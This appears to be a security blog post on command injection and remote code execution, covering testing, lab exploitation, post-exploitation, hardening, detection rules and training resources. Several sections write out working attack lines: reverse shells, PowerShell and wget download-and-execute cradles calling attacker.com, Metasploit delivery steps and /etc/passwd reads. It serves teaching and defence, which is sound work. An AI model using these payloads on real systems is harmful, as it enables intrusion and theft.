How a Single Command Injection Turned Into Full Remote Code Execution on a Fortune 500 (And Why Your Dev Team Is Next) + Video

Introduction:

Remote Code Execution (RCE) remains the holy grail for attackers and bug bounty hunters alike—it allows arbitrary command execution on a target server, often leading to complete system compromise. The casual LinkedIn post “I got remote code execution on another company!” highlights a stark reality: many organizations still expose vulnerable endpoints that trivialize RCE via unsanitized inputs, outdated libraries, or misconfigured cloud services. Understanding how RCE works from initial discovery to exploitation and mitigation is no longer optional for modern security teams.

Learning Objectives:

  • Identify and manually test for command injection and unsafe deserialization vulnerabilities across Linux/Windows environments.
  • Execute controlled RCE exploitation using native command-line tools, Metasploit, and custom scripts.
  • Apply layered mitigations including input validation, WAF rules, and immutable infrastructure patterns to block RCE.

You Should Know:

1. Understanding Remote Code Execution (RCE) – The Anatomy of a Takeover

RCE occurs when an attacker injects operating system commands or malicious code into an application’s execution context. The most common vector is command injection via web parameters, file uploads, or HTTP headers. For example, a vulnerable PHP application might call `system($_GET['cmd'])` without sanitization.

Step‑by‑step guide to testing for RCE:

Linux – Use `curl` to inject a time‑based payload:

curl -X GET "http://target.com/page?file=document.pdf; sleep 5"

If the response delays by 5 seconds, command injection exists. To confirm and get output:

curl "http://target.com/page?file=document.pdf; ls%20-la"

Windows – Inject ping or `dir` with URL encoding:

Invoke-WebRequest -Uri "http://target.com/search?q=test%26dir%20C:\"

Look for directory listings in the HTML response.

For blind RCE, use out‑of‑band (OOB) techniques:

# Linux – DNS exfiltration
curl "http://target.com/upload?name=test; nslookup whoami.attacker.com"

# Windows – PowerShell callback
curl "http://target.com/api?input=test; powershell -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/rev.ps1')"

2. Mapping the Attack Surface for RCE Opportunities

Before exploiting, you need a reconnaissance phase. Focus on user input interfaces: search bars, file uploads, API endpoints, and even HTTP headers like `User-Agent` or `X-Forwarded-For`. Use automated scanners but verify manually.

Step‑by‑step guide using Nmap and custom fuzzing:

1. Discover web servers and common RCE‑prone paths:

nmap -p 80,443,8080,8443 --script "http-enum,http-vuln*" target.com

2. Fuzz for command injection using `ffuf` and a wordlist of dangerous characters (;, |, &&, `):

ffuf -u "http://target.com/ping?ip=FUZZ" -w payloads.txt -mr "uid=|ping=|dir "

3. For API security, test JSON parameters:

curl -X POST https://api.target.com/v1/exec -H "Content-Type: application/json" -d '{"command":"; cat /etc/passwd"}'

If the API passes the unsanitized value to a shell and executes it, you’ve found an RCE.

3. Exploiting a Realistic RCE Vulnerability (Lab Setup)

Set up a local vulnerable container to practice ethical exploitation. Use `damnvulnerableweb` or `DVWA` with command injection level set to high.

Step‑by‑step manual exploitation:

Linux target example (command injection via ping tool):

  • The vulnerable form accepts an IP and runs `ping -c 4 $ip`.
  • Inject: `127.0.0.1; wget http://attacker.com/shell.sh -O /tmp/shell.sh; bash /tmp/shell.sh`
    – This downloads and executes a reverse shell script.

Reverse shell one‑liners (Linux):

# Netcat (traditional, with -e support)
nc -e /bin/sh attacker_ip 4444

# Bash
bash -i >& /dev/tcp/attacker_ip/4444 0>&1

# Python (when netcat is missing)
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker_ip",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Windows target reverse shell using PowerShell:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX(New-Object System.Net.WebClient).DownloadString('http://attacker_ip/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress attacker_ip -Port 4444"

Using Metasploit for staged payloads (target 2 is the PowerShell delivery method):

msfconsole
use exploit/multi/script/web_delivery
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set LHOST attacker_ip
run

Paste the generated one‑liner on the vulnerable Windows server.

4. Mitigation & Hardening – From Patch to Prevention

Blocking RCE requires defense in depth. Apply these steps immediately.

Step‑by‑step hardening guide:

1. Input validation (allow‑list approach):

  • For IP fields, only allow IPv4/v6 patterns via regex.
  • For file uploads, reject any filename containing ;, |, $, `.

2. Use parameterized APIs and avoid system calls:

Replace `system()` with language‑safe alternatives (e.g., `subprocess.run` with `shell=False` in Python).
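The vulnerable ping form from the lab section beside its hardened form, as an added example (not code from the original post): the vulnerable version builds one shell string, so a `;` in the input starts a second command; the hardened version allow-lists the input with `ipaddress` and hands `subprocess.run` an argv list with `shell=False`, so no shell ever parses the value. Function and constant names are assumptions for this example.

```python
import ipaddress
import subprocess
from typing import List

# Constructed inputs for the demo: a benign address and an injection attempt.
BENIGN = "127.0.0.1"
INJECTED = "127.0.0.1; id"


def ping_vulnerable_cmdline(ip: str) -> str:
    """Build the shell line the vulnerable form runs (shown, not executed).
    With system()/shell=True the whole string is parsed by /bin/sh, so ';'
    terminates the ping command and starts the attacker's command."""
    return f"ping -c 4 {ip}"


def validate_ip(value: str) -> str:
    """Allow-list check: accept only a syntactically valid IPv4/IPv6 address.
    ipaddress rejects spaces, ';', '|', '&', backticks and anything else that
    is not an address, so metacharacters never reach the command line."""
    try:
        return str(ipaddress.ip_address(value.strip()))
    except ValueError as exc:
        raise ValueError(f"rejected input: {value!r}") from exc


def ping_hardened_argv(ip: str) -> List[str]:
    """Argv for the hardened call: the address is one argument, not a string
    for a shell to interpret."""
    return ["ping", "-c", "4", validate_ip(ip)]


def run_ping(ip: str, timeout: float = 10.0) -> subprocess.CompletedProcess:
    """Hardened execution: validated argv, shell=False, bounded runtime."""
    return subprocess.run(ping_hardened_argv(ip), shell=False,
                          capture_output=True, text=True, timeout=timeout)


if __name__ == "__main__":
    print("vulnerable shell line:", ping_vulnerable_cmdline(INJECTED))
    print("hardened argv:", ping_hardened_argv(BENIGN))
    try:
        ping_hardened_argv(INJECTED)
    except ValueError as err:
        print("blocked:", err)
```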

3. Deploy a Web Application Firewall (WAF) with custom rules:

ModSecurity rule example that blocks shell metacharacters (;, &, |, `, $) in request arguments:

SecRule ARGS "@rx [;&|`\$]" "id:100,phase:2,deny,status:403,msg:'Command Injection'"

4. Cloud hardening (AWS):

  • Use Systems Manager Parameter Store for secrets, never inline commands.
  • Enforce IMDSv2 so an attacker who has gained RCE or SSRF cannot trivially read instance credentials from the metadata service.
  • AWS WAF with the managed rule group AWSManagedRulesLinuxRuleSet:

aws wafv2 create-web-acl --name BlockRCE --scope REGIONAL --default-action Block={} --rules ...

5. Linux host hardening:

  • Enable SELinux or AppArmor to confine web server processes.
  • Disable dangerous functions in php.ini: disable_functions = exec,passthru,shell_exec,system.

6. Windows specific:

  • Enable Windows Defender Application Control (WDAC) to block unapproved binaries.
  • Disable PowerShell script execution unless signed: Set-ExecutionPolicy AllSigned.

5. Post‑Exploitation & Detection – How to Know You’ve Been Owned

Understanding what an attacker does after RCE helps blue teams build detection analytics.

Step‑by‑step post‑exploitation actions (red team perspective):

1. Enumeration:

# Linux
id; uname -a; cat /etc/passwd; netstat -tulpn

# Windows
whoami /all; systeminfo; netstat -ano

2. Persistence:

  • Linux: add SSH key to `/root/.ssh/authorized_keys` or cron job.
  • Windows: scheduled task or registry run key.
  3. Lateral movement using PsExec or SSH key theft.

Detection (blue team):

  • Monitor for anomalous process creation (e.g., `cmd.exe` spawning `powershell.exe`). Sysmon config fragment (placed inside the `<Sysmon>` root element):

    <EventFiltering>
      <ProcessCreate onmatch="include">
        <ParentImage condition="is">C:\Windows\System32\cmd.exe</ParentImage>
        <Image condition="contains">powershell</Image>
      </ProcessCreate>
    </EventFiltering>

  • Linux auditd rule to alert on `execve` of shells from the web server user:

    -w /usr/bin/bash -p x -k webshell

    The `-w` watch logs every execution of bash; to restrict it to the web server account, use a syscall rule with a uid filter instead, e.g. `-a always,exit -F arch=b64 -S execve -F uid=www-data -k webshell`.

  • Deploy EDR with behavioral rules for WMI and remote service creation.

6. Ethical Hacking Training & Certifications to Master RCE
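The detection rules above (cmd.exe spawning PowerShell, a web server process launching a shell, the auditd `webshell` key firing under the web server’s uid) run over a few constructed process-creation events, as an added example that is not part of the original post. The events are normalised Sysmon Event ID 1 / auditd style dictionaries; field names, the uid 33 assumption for www-data, and the rule names are assumptions for this example.

```python
import re
from typing import Dict, List

# Constructed sample events (not real telemetry): Sysmon Event ID 1 style
# fields for Windows, auditd SYSCALL/EXECVE style fields for Linux.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"os": "windows", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"os": "windows", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe"},
    {"os": "windows", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe"},
    {"os": "linux", "exe": "/usr/bin/bash", "uid": "33",
     "parent_exe": "/usr/sbin/apache2", "key": "webshell"},
    {"os": "linux", "exe": "/usr/bin/bash", "uid": "1000",
     "parent_exe": "/usr/sbin/sshd", "key": "webshell"},
]

WEB_SERVERS = {"w3wp.exe", "httpd", "apache2", "nginx", "php-fpm"}
SHELLS = {"bash", "sh", "dash", "cmd.exe", "powershell.exe", "pwsh.exe"}
WEB_UIDS = {"33"}  # www-data on Debian/Ubuntu; assumption, adjust per host


def basename(path: str) -> str:
    """Last path component for either / or \\ separators, lower-cased."""
    return re.split(r"[\\/]", path)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of the detection rules that fire for one event."""
    if event["os"] == "windows":
        parent, child = basename(event["ParentImage"]), basename(event["Image"])
    else:
        parent, child = basename(event["parent_exe"]), basename(event["exe"])
    hits = []
    # Rule 1: the Sysmon include rule from the text (cmd.exe -> powershell).
    if parent == "cmd.exe" and "powershell" in child:
        hits.append("cmd_spawns_powershell")
    # Rule 2: a web server process launching any shell (webshell / RCE pattern).
    if parent in WEB_SERVERS and child in SHELLS:
        hits.append("webserver_spawns_shell")
    # Rule 3: the auditd 'webshell' key fired under the web server's uid.
    if (event["os"] == "linux" and event.get("key") == "webshell"
            and event.get("uid") in WEB_UIDS):
        hits.append("web_user_exec_shell")
    return hits


def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Keep only the events that tripped at least one rule."""
    return [{"event": e, "rules": classify(e)} for e in events if classify(e)]


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["rules"], alert["event"])
```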

To legally practice and report RCE findings, structured learning is essential.

Recommended courses and certifications:

  • Practical Ethical Hacking by TCM Security – includes hands‑on RCE labs.
  • OSCP (Offensive Security Certified Professional) – exams require manual command injection exploitation.
  • PortSwigger Web Security Academy – free labs on OS command injection and code injection.
  • INE’s eJPT / eCPPT – great for beginners with a focus on real‑world RCE.

Free labs to develop skills:

  • HackTheBox – machines like “Bashed” and “Craft” teach RCE.
  • TryHackMe – rooms “Command Injection” and “OWASP Top 10”.
  • VulnHub – download vulnerable VMs (e.g., “DC‑1”, “Mr-Robot”).

Lab setup command (Docker for local DVWA):

docker run --rm -p 80:80 vulnerables/web-dvwa

Log in with admin/password, set the security level to low, and navigate to Command Injection.

7. API Security & Cloud RCE – The Modern Attack Surface

APIs are now the leading RCE vector due to serverless functions and GraphQL endpoints.

Step‑by‑step testing of a GraphQL endpoint:

1. Introspect the schema:

query { __schema { types { name fields { name } } } }

2. Look for fields like exec, system, bash, eval. If found, attempt:

mutation { runCommand(cmd: "cat /etc/passwd") }

3. For REST APIs, fuzz JSON parameters with payloads like:

{"username": "admin; curl attacker.com/steal"}

Cloud‑specific RCE (AWS Lambda example):

If a Lambda function unsafely uses `os.system(event['user_input'])`, an attacker can invoke it via:

aws lambda invoke --function-name vulnerableFunc --payload '{"user_input":"; curl http://attacker.com/creds.sh | bash"}' out.txt

Hardening: Use AWS WAF to filter malicious JSON, enforce IAM least privilege, and never embed user input into system calls – use SDK APIs instead.

What Undercode Say:

  • Key Takeaway 1: Remote code execution is not a theoretical risk – it surfaces from mundane insecure coding patterns like unsanitized shell calls, and it can be reliably discovered with a handful of fuzzing commands.
  • Key Takeaway 2: Layered mitigations (WAF + allow‑list input validation + runtime application self‑protection) remain the only effective defense, as no single patch covers all RCE variants.

Additionally, the casual “I got RCE on another company” conversation underscores a cultural gap: ethical hackers and developers rarely share the same language. Until organizations embed continuous, hands‑on RCE training across their DevOps pipelines, we will keep seeing headlines about data breaches starting from a single semicolon. The commands and steps shown above are not just for attackers – they are the diagnostic tools every defender must master to understand and block real‑world intrusions.

Prediction:

Within the next 24 months, attackers will shift from classic web‑based command injection to AI‑generated payloads that dynamically adapt to input validation logic. We will also see a surge in supply‑chain RCE, where malicious code is injected into open‑source libraries that parse configuration files. Consequently, regulatory bodies will mandate runtime protection for APIs, and bug bounty payouts for blind RCE vulnerabilities will exceed $50,000 – forcing organizations to adopt immutable infrastructure and eBPF‑based detection as standard practice.

Reported By: 𝗠𝗲 𝗜 – Hackers Feeds
Extra Hub: Undercode MoN